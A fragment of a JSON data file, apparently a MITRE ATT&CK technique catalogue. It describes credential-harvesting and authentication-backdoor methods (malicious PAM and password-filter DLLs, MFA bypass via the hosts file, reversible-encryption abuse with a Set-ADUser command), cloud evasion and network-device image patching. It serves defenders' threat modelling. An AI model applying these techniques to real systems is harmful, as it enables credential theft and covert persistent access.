"description": "Adversaries may patch, modify, or otherwise backdoor cloud authentication processes that are tied to on-premises user identities in order to bypass typical authentication mechanisms, access credentials, and enable persistent access to accounts. \n\nMany organizations maintain hybrid user and device identities that are shared between on-premises and cloud-based environments. These can be maintained in a number of ways. For example, Azure AD includes three options for synchronizing identities between Active Directory and Azure AD<sup>[[Azure AD Hybrid Identity](https://app.tidalcyber.com/references/b019406c-6e39-41a2-a8b4-97f8d6482147)]</sup>:\n\n* Password Hash Synchronization (PHS), in which a privileged on-premises account synchronizes user password hashes between Active Directory and Azure AD, allowing authentication to Azure AD to take place entirely in the cloud \n* Pass Through Authentication (PTA), in which Azure AD authentication attempts are forwarded to an on-premises PTA agent, which validates the credentials against Active Directory \n* Active Directory Federation Services (AD FS), in which a trust relationship is established between Active Directory and Azure AD \n\nAD FS can also be used with other SaaS and cloud platforms such as AWS and GCP, which will hand off the authentication process to AD FS and receive a token containing the hybrid users identity and privileges. \n\nBy modifying authentication processes tied to hybrid identities, an adversary may be able to establish persistent privileged access to cloud resources. For example, adversaries who compromise an on-premises server running a PTA agent may inject a malicious DLL into the `AzureADConnectAuthenticationAgentService` process that authorizes all attempts to authenticate to Azure AD, as well as records user credentials.<sup>[[Azure AD Connect for Read Teamers](https://app.tidalcyber.com/references/0b9946ff-8c1c-4d93-8401-e1e4dd186305)]</sup><sup>[[AADInternals Azure AD On-Prem to Cloud](https://app.tidalcyber.com/references/7a6a7ecd-b9c7-4371-9924-34733597556c)]</sup> In environments using AD FS, an adversary may edit the `Microsoft.IdentityServer.Servicehost` configuration file to load a malicious DLL that generates authentication tokens for any user with any set of claims, thereby bypassing multi-factor authentication and defined AD FS policies.<sup>[[MagicWeb](https://app.tidalcyber.com/references/5b728693-37e8-4100-ac82-b70945113e07)]</sup>\n\nIn some cases, adversaries may be able to modify the hybrid identity authentication process from the cloud. For example, adversaries who compromise a Global Administrator account in an Azure AD tenant may be able to register a new PTA agent via the web console, similarly allowing them to harvest credentials and log into the Azure AD environment as any user.<sup>[[Mandiant Azure AD Backdoors](https://app.tidalcyber.com/references/7b4502ff-a45c-4ba7-b00e-ca9f6e9c2ac8)]</sup>",
"meta": {
"source": "MITRE",
"technique_attack_id": "T1556.007"
},
"related": [
{
"dest-uuid": "0c3132d5-c0df-4793-b5f2-1a95bd64ab53",
"type": "uses"
},
{
"dest-uuid": "ec4f9786-c00c-430a-bc6d-0d0d22fdd393",
"type": "uses"
},
{
"dest-uuid": "8e29c6c9-0c10-4bb0-827d-ff0ab8922726",
"type": "uses"
}
],
"uuid": "b0a1ef13-0c54-47e8-a220-7543ba41a327",
"value": "Hybrid Identity"
},
{
"description": "Adversaries may disable or modify multi-factor authentication (MFA) mechanisms to enable persistent access to compromised accounts.\n\nOnce adversaries have gained access to a network by either compromising an account lacking MFA or by employing an MFA bypass method such as [Multi-Factor Authentication Request Generation](https://app.tidalcyber.com/technique/c0f2efd4-bfc8-43da-9859-14446fb8f289), adversaries may leverage their access to modify or completely disable MFA defenses. This can be accomplished by abusing legitimate features, such as excluding users from Azure AD Conditional Access Policies, registering a new yet vulnerable/adversary-controlled MFA method, or by manually patching MFA programs and configuration files to bypass expected functionality.<sup>[[Mandiant APT42](https://app.tidalcyber.com/references/10b3e476-a0c5-41fd-8cb8-5bfb245b118f)]</sup><sup>[[Azure AD Conditional Access Exclusions](https://app.tidalcyber.com/references/8cfb45ec-b660-4a3a-9175-af4ea01ef473)]</sup>\n\nFor example, modifying the Windows hosts file (`C:\\windows\\system32\\drivers\\etc\\hosts`) to redirect MFA calls to localhost instead of an MFA server may cause the MFA process to fail. If a \"fail open\" policy is in place, any otherwise successful authentication attempt may be granted access without enforcing MFA. <sup>[[Russians Exploit Default MFA Protocol - CISA March 2022](https://app.tidalcyber.com/references/00c6ff88-6eeb-486d-ae69-dffd5aebafe6)]</sup> \n\nDepending on the scope, goals, and privileges of the adversary, MFA defenses may be disabled for individual accounts or for all accounts tied to a larger group, such as all domain accounts in a victim's network environment.<sup>[[Russians Exploit Default MFA Protocol - CISA March 2022](https://app.tidalcyber.com/references/00c6ff88-6eeb-486d-ae69-dffd5aebafe6)]</sup> ",
"meta": {
"source": "MITRE",
"technique_attack_id": "T1556.006"
},
"related": [
{
"dest-uuid": "0c3132d5-c0df-4793-b5f2-1a95bd64ab53",
"type": "uses"
},
{
"dest-uuid": "ec4f9786-c00c-430a-bc6d-0d0d22fdd393",
"type": "uses"
},
{
"dest-uuid": "8e29c6c9-0c10-4bb0-827d-ff0ab8922726",
"type": "uses"
}
],
"uuid": "60498bb5-fcfb-4d85-bf3e-26c30c08fbda",
"value": "Multi-Factor Authentication"
},
{
"description": "Adversaries may use [Patch System Image](https://app.tidalcyber.com/technique/630a17c1-0176-4764-8f5c-a83f4f3e980f) to hard code a password in the operating system, thus bypassing of native authentication mechanisms for local accounts on network devices.\n\n[Modify System Image](https://app.tidalcyber.com/technique/f435a5ff-78d2-44de-b464-2b5528f94adc) may include implanted code to the operating system for network devices to provide access for adversaries using a specific password. The modification includes a specific password which is implanted in the operating system image via the patch. Upon authentication attempts, the inserted code will first check to see if the user input is the password. If so, access is granted. Otherwise, the implanted code will pass the credentials on for verification of potentially valid credentials.<sup>[[Mandiant - Synful Knock](https://app.tidalcyber.com/references/1f6eaa98-9184-4341-8634-5512a9c632dd)]</sup>",
"meta": {
"source": "MITRE",
"technique_attack_id": "T1556.004"
},
"related": [
{
"dest-uuid": "0c3132d5-c0df-4793-b5f2-1a95bd64ab53",
"type": "uses"
},
{
"dest-uuid": "ec4f9786-c00c-430a-bc6d-0d0d22fdd393",
"type": "uses"
},
{
"dest-uuid": "8e29c6c9-0c10-4bb0-827d-ff0ab8922726",
"type": "uses"
}
],
"uuid": "195aa08b-15fd-4019-b905-8f31bc5e2094",
"value": "Network Device Authentication"
},
{
"description": "Adversaries may register malicious network provider dynamic link libraries (DLLs) to capture cleartext user credentials during the authentication process. Network provider DLLs allow Windows to interface with specific network protocols and can also support add-on credential management functions.<sup>[[Network Provider API](https://app.tidalcyber.com/references/b218434e-4233-5963-824e-50ee32d468ed)]</sup> During the logon process, Winlogon (the interactive logon module) sends credentials to the local `mpnotify.exe` process via RPC. The `mpnotify.exe` process then shares the credentials in cleartext with registered credential managers when notifying that a logon event is happening.<sup>[[NPPSPY - Huntress](https://app.tidalcyber.com/references/df1f7379-38c3-5ca9-8333-d684022c000c)]</sup><sup>[[NPPSPY Video](https://app.tidalcyber.com/references/6533d5df-7388-5c59-8c63-0923de34b61d)]</sup><sup>[[NPLogonNotify](https://app.tidalcyber.com/references/1fda833e-e543-5e68-a0f5-8a4170dd632a)]</sup> \n\nAdversaries can configure a malicious network provider DLL to receive credentials from `mpnotify.exe`.<sup>[[NPPSPY](https://app.tidalcyber.com/references/c12bfaf6-4d83-552e-912b-cc55bce85961)]</sup> Once installed as a credential manager (via the Registry), a malicious DLL can receive and save credentials each time a user logs onto a Windows workstation or domain via the `NPLogonNotify()` function.<sup>[[NPLogonNotify](https://app.tidalcyber.com/references/1fda833e-e543-5e68-a0f5-8a4170dd632a)]</sup>\n\nAdversaries may target planting malicious network provider DLLs on systems known to have increased logon activity and/or administrator logon activity, such as servers and domain controllers.<sup>[[NPPSPY - Huntress](https://app.tidalcyber.com/references/df1f7379-38c3-5ca9-8333-d684022c000c)]</sup>",
"meta": {
"source": "MITRE",
"technique_attack_id": "T1556.008"
},
"related": [
{
"dest-uuid": "0c3132d5-c0df-4793-b5f2-1a95bd64ab53",
"type": "uses"
},
{
"dest-uuid": "ec4f9786-c00c-430a-bc6d-0d0d22fdd393",
"type": "uses"
},
{
"dest-uuid": "8e29c6c9-0c10-4bb0-827d-ff0ab8922726",
"type": "uses"
}
],
"uuid": "f1329084-6e9c-5933-83cd-56c1bf8439e3",
"value": "Network Provider DLL"
},
{
"description": "Adversaries may register malicious password filter dynamic link libraries (DLLs) into the authentication process to acquire user credentials as they are validated. \n\nWindows password filters are password policy enforcement mechanisms for both domain and local accounts. Filters are implemented as DLLs containing a method to validate potential passwords against password policies. Filter DLLs can be positioned on local computers for local accounts and/or domain controllers for domain accounts. Before registering new passwords in the Security Accounts Manager (SAM), the Local Security Authority (LSA) requests validation from each registered filter. Any potential changes cannot take effect until every registered filter acknowledges validation. \n\nAdversaries can register malicious password filters to harvest credentials from local computers and/or entire domains. To perform proper validation, filters must receive plain-text credentials from the LSA. A malicious password filter would receive these plain-text credentials every time a password request is made.<sup>[[Carnal Ownage Password Filters Sept 2013](https://app.tidalcyber.com/references/78ed9074-a46c-4ce6-ab7d-a587bd585dc5)]</sup>",
"meta": {
"source": "MITRE",
"technique_attack_id": "T1556.002"
},
"related": [
{
"dest-uuid": "0c3132d5-c0df-4793-b5f2-1a95bd64ab53",
"type": "uses"
},
{
"dest-uuid": "ec4f9786-c00c-430a-bc6d-0d0d22fdd393",
"type": "uses"
},
{
"dest-uuid": "8e29c6c9-0c10-4bb0-827d-ff0ab8922726",
"type": "uses"
}
],
"uuid": "cd65b0f4-a2a4-4291-aff2-1c65cf68cf6c",
"value": "Password Filter DLL"
},
{
"description": "Adversaries may modify pluggable authentication modules (PAM) to access user credentials or enable otherwise unwarranted access to accounts. PAM is a modular system of configuration files, libraries, and executable files which guide authentication for many services. The most common authentication module is <code>pam_unix.so</code>, which retrieves, sets, and verifies account authentication information in <code>/etc/passwd</code> and <code>/etc/shadow</code>.<sup>[[Apple PAM](https://app.tidalcyber.com/references/4838a58e-c00d-4b4c-937d-8da5d9f1a4b5)]</sup><sup>[[Man Pam_Unix](https://app.tidalcyber.com/references/6bc5ad93-3cc2-4429-ac4c-aae72193df27)]</sup><sup>[[Red Hat PAM](https://app.tidalcyber.com/references/3dc88605-64c8-495a-9e3b-e5686fd2eb03)]</sup>\n\nAdversaries may modify components of the PAM system to create backdoors. PAM components, such as <code>pam_unix.so</code>, can be patched to accept arbitrary adversary supplied values as legitimate credentials.<sup>[[PAM Backdoor](https://app.tidalcyber.com/references/da1ffaf1-39f9-4516-8c04-4a4301e13585)]</sup>\n\nMalicious modifications to the PAM system may also be abused to steal credentials. Adversaries may infect PAM resources with code to harvest user credentials, since the values exchanged with PAM components may be plain-text since PAM does not store passwords.<sup>[[PAM Creds](https://app.tidalcyber.com/references/aa9d5bdd-2102-4322-8736-56db8e083fc0)]</sup><sup>[[Apple PAM](https://app.tidalcyber.com/references/4838a58e-c00d-4b4c-937d-8da5d9f1a4b5)]</sup>",
"meta": {
"source": "MITRE",
"technique_attack_id": "T1556.003"
},
"related": [
{
"dest-uuid": "0c3132d5-c0df-4793-b5f2-1a95bd64ab53",
"type": "uses"
},
{
"dest-uuid": "ec4f9786-c00c-430a-bc6d-0d0d22fdd393",
"type": "uses"
},
{
"dest-uuid": "8e29c6c9-0c10-4bb0-827d-ff0ab8922726",
"type": "uses"
}
],
"uuid": "852748c2-280b-41e8-ba87-d97ec9fade70",
"value": "Pluggable Authentication Modules"
},
{
"description": "An adversary may abuse Active Directory authentication encryption properties to gain access to credentials on Windows systems. The <code>AllowReversiblePasswordEncryption</code> property specifies whether reversible password encryption for an account is enabled or disabled. By default this property is disabled (instead storing user credentials as the output of one-way hashing functions) and should not be enabled unless legacy or other software require it.<sup>[[store_pwd_rev_enc](https://app.tidalcyber.com/references/d3b9df24-b776-4658-9bb4-f43a2fe0094c)]</sup>\n\nIf the property is enabled and/or a user changes their password after it is enabled, an adversary may be able to obtain the plaintext of passwords created/changed after the property was enabled. To decrypt the passwords, an adversary needs four components:\n\n1. Encrypted password (<code>G$RADIUSCHAP</code>) from the Active Directory user-structure <code>userParameters</code>\n2. 16 byte randomly-generated value (<code>G$RADIUSCHAPKEY</code>) also from <code>userParameters</code>\n3. Global LSA secret (<code>G$MSRADIUSCHAPKEY</code>)\n4. Static key hardcoded in the Remote Access Subauthentication DLL (<code>RASSFM.DLL</code>)\n\nWith this information, an adversary may be able to reproduce the encryption key and subsequently decrypt the encrypted password value.<sup>[[how_pwd_rev_enc_1](https://app.tidalcyber.com/references/180246ca-94d8-4c78-894d-ae3b6fad3257)]</sup><sup>[[how_pwd_rev_enc_2](https://app.tidalcyber.com/references/cc08f190-5c17-441c-a6fa-99f8fdb8d1ae)]</sup>\n\nAn adversary may set this property at various scopes through Local Group Policy Editor, user properties, Fine-Grained Password Policy (FGPP), or via the ActiveDirectory [PowerShell](https://app.tidalcyber.com/technique/6ca7838a-e8ad-43e8-9da6-15b640d1cbde) module. For example, an adversary may implement and apply a FGPP to users or groups if the Domain Functional Level is set to \"Windows Server 2008\" or higher.<sup>[[dump_pwd_dcsync](https://app.tidalcyber.com/references/bd1d7e75-feee-47fd-abfb-7e3dfc648a72)]</sup> In PowerShell, an adversary may make associated changes to user settings using commands similar to <code>Set-ADUser -AllowReversiblePasswordEncryption $true</code>.",
"meta": {
"source": "MITRE",
"technique_attack_id": "T1556.005"
},
"related": [
{
"dest-uuid": "0c3132d5-c0df-4793-b5f2-1a95bd64ab53",
"type": "uses"
},
{
"dest-uuid": "ec4f9786-c00c-430a-bc6d-0d0d22fdd393",
"type": "uses"
},
{
"dest-uuid": "8e29c6c9-0c10-4bb0-827d-ff0ab8922726",
"type": "uses"
}
],
"uuid": "9dc21246-3788-48d6-b6a1-f2a39ee38557",
"value": "Reversible Encryption"
},
{
"description": "Adversaries may modify authentication mechanisms and processes to access user credentials or enable otherwise unwarranted access to accounts. The authentication process is handled by mechanisms, such as the Local Security Authentication Server (LSASS) process and the Security Accounts Manager (SAM) on Windows, pluggable authentication modules (PAM) on Unix-based systems, and authorization plugins on MacOS systems, responsible for gathering, storing, and validating credentials. By modifying an authentication process, an adversary may be able to authenticate to a service or system without using [Valid Accounts](https://app.tidalcyber.com/technique/a9b7eb2f-63e7-41bc-9d77-f7c4cede5406).\n\nAdversaries may maliciously modify a part of this process to either reveal credentials or bypass authentication mechanisms. Compromised credentials or access may be used to bypass access controls placed on various resources on systems within the network and may even be used for persistent access to remote systems and externally available services, such as VPNs, Outlook Web Access and remote desktop.",
"meta": {
"platforms": [
"Azure AD",
"Google Workspace",
"IaaS",
"Linux",
"macOS",
"Network",
"Office 365",
"SaaS",
"Windows"
],
"source": "MITRE"
},
"related": [
{
"dest-uuid": "0c3132d5-c0df-4793-b5f2-1a95bd64ab53",
"type": "uses"
},
{
"dest-uuid": "ec4f9786-c00c-430a-bc6d-0d0d22fdd393",
"type": "uses"
},
{
"dest-uuid": "8e29c6c9-0c10-4bb0-827d-ff0ab8922726",
"type": "uses"
},
{
"dest-uuid": "82d15799-9776-463e-9b87-a58d682cee55",
"type": "similar"
},
{
"dest-uuid": "b0a1ef13-0c54-47e8-a220-7543ba41a327",
"type": "similar"
},
{
"dest-uuid": "60498bb5-fcfb-4d85-bf3e-26c30c08fbda",
"type": "similar"
},
{
"dest-uuid": "195aa08b-15fd-4019-b905-8f31bc5e2094",
"type": "similar"
},
{
"dest-uuid": "f1329084-6e9c-5933-83cd-56c1bf8439e3",
"type": "similar"
},
{
"dest-uuid": "cd65b0f4-a2a4-4291-aff2-1c65cf68cf6c",
"type": "similar"
},
{
"dest-uuid": "852748c2-280b-41e8-ba87-d97ec9fade70",
"type": "similar"
},
{
"dest-uuid": "9dc21246-3788-48d6-b6a1-f2a39ee38557",
"type": "similar"
}
],
"uuid": "f516ecd7-a6a6-4018-8e58-c007be05bdce",
"value": "Modify Authentication Process"
},
{
"description": "An adversary may create a new instance or virtual machine (VM) within the compute service of a cloud account to evade defenses. Creating a new instance may allow an adversary to bypass firewall rules and permissions that exist on instances currently residing within an account. An adversary may [Create Snapshot](https://app.tidalcyber.com/technique/bcaf63dc-660a-40d4-ba28-fc113b34bf51) of one or more volumes in an account, create a new instance, mount the snapshots, and then apply a less restrictive security policy to collect [Data from Local System](https://app.tidalcyber.com/technique/c0e4f97b-f651-493f-9636-6ac2f6fb46fb) or for [Remote Data Staging](https://app.tidalcyber.com/technique/cf76b79c-8226-4137-b3dd-8f516611b928).<sup>[[Mandiant M-Trends 2020](https://app.tidalcyber.com/references/83bc9b28-f8b3-4522-b9f1-f43bce3ae917)]</sup>\n\nCreating a new instance may also allow an adversary to carry out malicious activity within an environment without affecting the execution of current running instances.",
"meta": {
"source": "MITRE",
"technique_attack_id": "T1578.002"
},
"related": [
{
"dest-uuid": "8e29c6c9-0c10-4bb0-827d-ff0ab8922726",
"type": "uses"
}
],
"uuid": "2ba8a662-6930-4cbe-9e3d-4cbe2109fd88",
"value": "Create Cloud Instance"
},
{
"description": "An adversary may create a snapshot or data backup within a cloud account to evade defenses. A snapshot is a point-in-time copy of an existing cloud compute component such as a virtual machine (VM), virtual hard drive, or volume. An adversary may leverage permissions to create a snapshot in order to bypass restrictions that prevent access to existing compute service infrastructure, unlike in [Revert Cloud Instance](https://app.tidalcyber.com/technique/d1836637-e61d-42bb-9067-b325a201b7c7) where an adversary may revert to a snapshot to evade detection and remove evidence of their presence.\n\nAn adversary may [Create Cloud Instance](https://app.tidalcyber.com/technique/2ba8a662-6930-4cbe-9e3d-4cbe2109fd88), mount one or more created snapshots to that instance, and then apply a policy that allows the adversary access to the created instance, such as a firewall policy that allows them inbound and outbound SSH access.<sup>[[Mandiant M-Trends 2020](https://app.tidalcyber.com/references/83bc9b28-f8b3-4522-b9f1-f43bce3ae917)]</sup>",
"meta": {
"source": "MITRE",
"technique_attack_id": "T1578.001"
},
"related": [
{
"dest-uuid": "8e29c6c9-0c10-4bb0-827d-ff0ab8922726",
"type": "uses"
}
],
"uuid": "bcaf63dc-660a-40d4-ba28-fc113b34bf51",
"value": "Create Snapshot"
},
{
"description": "An adversary may delete a cloud instance after they have performed malicious activities in an attempt to evade detection and remove evidence of their presence. Deleting an instance or virtual machine can remove valuable forensic artifacts and other evidence of suspicious behavior if the instance is not recoverable.\n\nAn adversary may also [Create Cloud Instance](https://app.tidalcyber.com/technique/2ba8a662-6930-4cbe-9e3d-4cbe2109fd88) and later terminate the instance after achieving their objectives.<sup>[[Mandiant M-Trends 2020](https://app.tidalcyber.com/references/83bc9b28-f8b3-4522-b9f1-f43bce3ae917)]</sup>",
"meta": {
"source": "MITRE",
"technique_attack_id": "T1578.003"
},
"related": [
{
"dest-uuid": "8e29c6c9-0c10-4bb0-827d-ff0ab8922726",
"type": "uses"
}
],
"uuid": "d7c90fc2-b7df-4e83-96af-9cf1c428ffa3",
"value": "Delete Cloud Instance"
},
{
"description": "Adversaries may modify settings that directly affect the size, locations, and resources available to cloud compute infrastructure in order to evade defenses. These settings may include service quotas, subscription associations, tenant-wide policies, or other configurations that impact available compute. Such modifications may allow adversaries to abuse the victims compute resources to achieve their goals, potentially without affecting the execution of running instances and/or revealing their activities to the victim.\n\nFor example, cloud providers often limit customer usage of compute resources via quotas. Customers may request adjustments to these quotas to support increased computing needs, though these adjustments may require approval from the cloud provider. Adversaries who compromise a cloud environment may similarly request quota adjustments in order to support their activities, such as enabling additional [Resource Hijacking](https://app.tidalcyber.com/technique/d10c4a15-aeaa-4630-a7a3-3373c89a584f) without raising suspicion by using up a victims entire quota.<sup>[[Microsoft Cryptojacking 2023](https://app.tidalcyber.com/references/e2dbc963-b913-5a44-bb61-88a3f0d8d8a3)]</sup> Adversaries may also increase allowed resource usage by modifying any tenant-wide policies that limit the sizes of deployed virtual machines.<sup>[[Microsoft Azure Policy](https://app.tidalcyber.com/references/761d102e-768a-5536-a098-0b1819029d33)]</sup>\n\nAdversaries may also modify settings that affect where cloud resources can be deployed, such as enabling [Unused/Unsupported Cloud Regions](https://app.tidalcyber.com/technique/edf9f7d7-bc14-4e25-800d-f508acb580d4). In Azure environments, an adversary who has gained access to a Global Administrator account may create new subscriptions in which to deploy resources, or engage in subscription hijacking by transferring an existing pay-as-you-go subscription from a victim tenant to an adversary-controlled tenant.<sup>[[Microsoft Peach Sandstorm 2023](https://app.tidalcyber.com/references/84d026ed-b8f2-5bbb-865a-2d93aa4b2ef8)]</sup> This will allow the adversary to use the victims compute resources without generating logs on the victim tenant.<sup>[[Microsoft Azure Policy](https://app.tidalcyber.com/references/761d102e-768a-5536-a098-0b1819029d33)]</sup> <sup>[[Microsoft Subscription Hijacking 2022](https://app.tidalcyber.com/references/e5944e4c-76c6-55d1-97ec-8367b7f98c28)]</sup>",
"meta": {
"source": "MITRE",
"technique_attack_id": "T1578.005"
},
"related": [
{
"dest-uuid": "8e29c6c9-0c10-4bb0-827d-ff0ab8922726",
"type": "uses"
}
],
"uuid": "04e8e75c-434e-51e0-9780-580a3823a8cb",
"value": "Modify Cloud Compute Configurations"
},
{
"description": "An adversary may revert changes made to a cloud instance after they have performed malicious activities in attempt to evade detection and remove evidence of their presence. In highly virtualized environments, such as cloud-based infrastructure, this may be accomplished by restoring virtual machine (VM) or data storage snapshots through the cloud management dashboard or cloud APIs.\n\nAnother variation of this technique is to utilize temporary storage attached to the compute instance. Most cloud providers provide various types of storage including persistent, local, and/or ephemeral, with the ephemeral types often reset upon stop/restart of the VM.<sup>[[Tech Republic - Restore AWS Snapshots](https://app.tidalcyber.com/references/bfe848a3-c855-4bca-a6ea-44804d48c7eb)]</sup><sup>[[Google - Restore Cloud Snapshot](https://app.tidalcyber.com/references/ffa46676-518e-4fef-965d-e91efae95dfc)]</sup>",
"meta": {
"source": "MITRE",
"technique_attack_id": "T1578.004"
},
"related": [
{
"dest-uuid": "8e29c6c9-0c10-4bb0-827d-ff0ab8922726",
"type": "uses"
}
],
"uuid": "d1836637-e61d-42bb-9067-b325a201b7c7",
"value": "Revert Cloud Instance"
},
{
"description": "An adversary may attempt to modify a cloud account's compute service infrastructure to evade defenses. A modification to the compute service infrastructure can include the creation, deletion, or modification of one or more components such as compute instances, virtual machines, and snapshots.\n\nPermissions gained from the modification of infrastructure components may bypass restrictions that prevent access to existing infrastructure. Modifying infrastructure components may also allow an adversary to evade detection and remove evidence of their presence.<sup>[[Mandiant M-Trends 2020](https://app.tidalcyber.com/references/83bc9b28-f8b3-4522-b9f1-f43bce3ae917)]</sup>",
"meta": {
"platforms": [
"IaaS"
],
"source": "MITRE"
},
"related": [
{
"dest-uuid": "8e29c6c9-0c10-4bb0-827d-ff0ab8922726",
"type": "uses"
},
{
"dest-uuid": "2ba8a662-6930-4cbe-9e3d-4cbe2109fd88",
"type": "similar"
},
{
"dest-uuid": "bcaf63dc-660a-40d4-ba28-fc113b34bf51",
"type": "similar"
},
{
"dest-uuid": "d7c90fc2-b7df-4e83-96af-9cf1c428ffa3",
"type": "similar"
},
{
"dest-uuid": "04e8e75c-434e-51e0-9780-580a3823a8cb",
"type": "similar"
},
{
"dest-uuid": "d1836637-e61d-42bb-9067-b325a201b7c7",
"type": "similar"
}
],
"uuid": "46c78b63-d079-441e-abdd-c16b39d4bab3",
"value": "Modify Cloud Compute Infrastructure"
},
{
"description": "Adversaries may interact with the Windows Registry to hide configuration information within Registry keys, remove information as part of cleaning up, or as part of other techniques to aid in persistence and execution.\n\nAccess to specific areas of the Registry depends on account permissions, some requiring administrator-level access. The built-in Windows command-line utility [Reg](https://app.tidalcyber.com/software/d796615c-fa3d-4afd-817a-1a3db8c73532) may be used for local or remote Registry modification. <sup>[[Microsoft Reg](https://app.tidalcyber.com/references/1e1b21bd-18b3-4c77-8eb8-911b028ab603)]</sup> Other tools may also be used, such as a remote access tool, which may contain functionality to interact with the Registry through the Windows API.\n\nRegistry modifications may also include actions to hide keys, such as prepending key names with a null character, which will cause an error and/or be ignored when read via [Reg](https://app.tidalcyber.com/software/d796615c-fa3d-4afd-817a-1a3db8c73532) or other utilities using the Win32 API. <sup>[[Microsoft Reghide NOV 2006](https://app.tidalcyber.com/references/42503ec7-f5da-4116-a3b3-a1b18a66eed3)]</sup> Adversaries may abuse these pseudo-hidden keys to conceal payloads/commands used to maintain persistence. <sup>[[TrendMicro POWELIKS AUG 2014](https://app.tidalcyber.com/references/4a42df15-4d09-4f4f-8333-2b41356fdb80)]</sup> <sup>[[SpectorOps Hiding Reg Jul 2017](https://app.tidalcyber.com/references/877a5ae4-ec5f-4f53-b69d-ba74ff9e1619)]</sup>\n\nThe Registry of a remote system may be modified to aid in execution of files as part of lateral movement. It requires the remote Registry service to be running on the target system. <sup>[[Microsoft Remote](https://app.tidalcyber.com/references/331d59e3-ce7f-483c-b77d-001c8a9ae1df)]</sup> Often [Valid Accounts](https://app.tidalcyber.com/technique/a9b7eb2f-63e7-41bc-9d77-f7c4cede5406) are required, along with access to the remote system's [SMB/Windows Admin Shares](https://app.tidalcyber.com/technique/bc2f2c6c-ffe7-4e78-bbac-369f6781bbdd) for RPC communication.",
"meta": {
"platforms": [
"Windows"
],
"source": "MITRE"
},
"related": [
{
"dest-uuid": "8e29c6c9-0c10-4bb0-827d-ff0ab8922726",
"type": "uses"
}
],
"uuid": "0dfeab84-3c42-4b56-9021-70fe5be4092b",
"value": "Modify Registry"
},
{
"description": "Adversaries may install an older version of the operating system of a network device to weaken security. Older operating system versions on network devices often have weaker encryption ciphers and, in general, fewer/less updated defensive features. <sup>[[Cisco Synful Knock Evolution](https://app.tidalcyber.com/references/29301297-8343-4f75-8096-7fe229812f75)]</sup>\n\nOn embedded devices, downgrading the version typically only requires replacing the operating system file in storage. With most embedded devices, this can be achieved by downloading a copy of the desired version of the operating system file and reconfiguring the device to boot from that file on next system restart. The adversary could then restart the device to implement the change immediately or they could wait until the next time the system restarts.\n\nDowngrading the system image to an older versions may allow an adversary to evade defenses by enabling behaviors such as [Weaken Encryption](https://app.tidalcyber.com/technique/8cf19b3d-c9fa-4d71-a6ab-dc0e236e57d4). Downgrading of a system image can be done on its own, or it can be used in conjunction with [Patch System Image](https://app.tidalcyber.com/technique/630a17c1-0176-4764-8f5c-a83f4f3e980f). ",
"meta": {
"source": "MITRE",
"technique_attack_id": "T1601.002"
},
"related": [
{
"dest-uuid": "8e29c6c9-0c10-4bb0-827d-ff0ab8922726",
"type": "uses"
}
],
"uuid": "49e3504a-e031-45a0-b816-1d3741a78c7f",
"value": "Downgrade System Image"
},
{
"description": "Adversaries may modify the operating system of a network device to introduce new capabilities or weaken existing defenses.<sup>[[Killing the myth of Cisco IOS rootkits](https://app.tidalcyber.com/references/538070d6-fbdb-4cc9-8ddf-c331e4375cfb)]</sup> <sup>[[Killing IOS diversity myth](https://app.tidalcyber.com/references/19d7ccc6-76ed-4b12-af50-f810fbc22037)]</sup> <sup>[[Cisco IOS Shellcode](https://app.tidalcyber.com/references/55a45f9b-7be4-4f1b-8b19-a0addf9da8d8)]</sup> <sup>[[Cisco IOS Forensics Developments](https://app.tidalcyber.com/references/95fdf251-f40d-4f7a-bb12-8762e9c961b9)]</sup> <sup>[[Juniper Netscreen of the Dead](https://app.tidalcyber.com/references/3b87bd85-c6dd-4bd9-9427-33b5bd84db4a)]</sup> Some network devices are built with a monolithic architecture, where the entire operating system and most of the functionality of the device is contained within a single file. Adversaries may change this file in storage, to be loaded in a future boot, or in memory during runtime.\n\nTo change the operating system in storage, the adversary will typically use the standard procedures available to device operators. This may involve downloading a new file via typical protocols used on network devices, such as TFTP, FTP, SCP, or a console connection. The original file may be overwritten, or a new file may be written alongside of it and the device reconfigured to boot to the compromised image.\n\nTo change the operating system in memory, the adversary typically can use one of two methods. In the first, the adversary would make use of native debug commands in the original, unaltered running operating system that allow them to directly modify the relevant memory addresses containing the running operating system. This method typically requires administrative level access to the device.\n\nIn the second method for changing the operating system in memory, the adversary would make use of the boot loader. The boot loader is the first piece of software that loads when the device starts that, in turn, will launch the operating system. Adversaries may use malicious code previously implanted in the boot loader, such as through the [ROMMONkit](https://app.tidalcyber.com/technique/b9d60848-388e-444c-9f22-2267ea61b5e9) method, to directly manipulate running operating system code in memory. This malicious code in the bootloader provides the capability of direct memory manipulation to the adversary, allowing them to patch the live operating system during runtime.\n\nBy modifying the instructions stored in the system image file, adversaries may either weaken existing defenses or provision new capabilities that the device did not have before. Examples of existing defenses that can be impeded include encryption, via [Weaken Encryption](https://app.tidalcyber.com/technique/8cf19b3d-c9fa-4d71-a6ab-dc0e236e57d4), authentication, via [Network Device Authentication](https://app.tidalcyber.com/technique/195aa08b-15fd-4019-b905-8f31bc5e2094), and perimeter defenses, via [Network Boundary Bridging](https://app.tidalcyber.com/technique/091282d8-ef05-487f-93aa-445efaeed71b). Adding new capabilities for the adversarys purpose include [Keylogging](https://app.tidalcyber.com/technique/7f1798b5-b159-441b-a5ef-3b5c706e1699), [Multi-hop Proxy](https://app.tidalcyber.com/technique/fa05c148-56a0-43ae-b8e4-2d4e91641400), and [Port Knocking](https://app.tidalcyber.com/technique/34a112db-c61d-4ea2-872f-de3fc1af87a3).\n\nAdversaries may also compromise existing commands in the operating system to produce false output to mislead defenders. When this method is used in conjunction with [Downgrade System Image](https://app.tidalcyber.com/technique/49e3504a-e031-45a0-b816-1d3741a78c7f), one example of a compromised system command may include changing the output of the command that shows the version of the currently running operating system. By patching the operating system, the adversary can change this command to instead display the original, higher revision number that they replaced through the system downgrade. \n\nWhen the operating system is patched in storage, this can be achieved in either the resident storage (typically a form of flash memory, which is non-volatile) or via [TFTP Boot](https://app.tidalcyber.com/technique/6f2186f3-c798-46e8-a26f-ae033822837b). \n\nWhen the technique is performed on the running operating system in memory and not on the stored copy, this technique will not survive across reboots. However, live memory modification of the operating system can be combined with [ROMMONkit](https://app.tidalcyber.com/technique/b9d60848-388e-444c-9f22-2267ea61b5e9) to achieve persistence. ",
"meta": {
"source": "MITRE",
"technique_attack_id": "T1601.001"
},
"related": [
{
"dest-uuid": "8e29c6c9-0c10-4bb0-827d-ff0ab8922726",
"type": "uses"
}
],
"uuid": "630a17c1-0176-4764-8f5c-a83f4f3e980f",
"value": "Patch System Image"
},
{
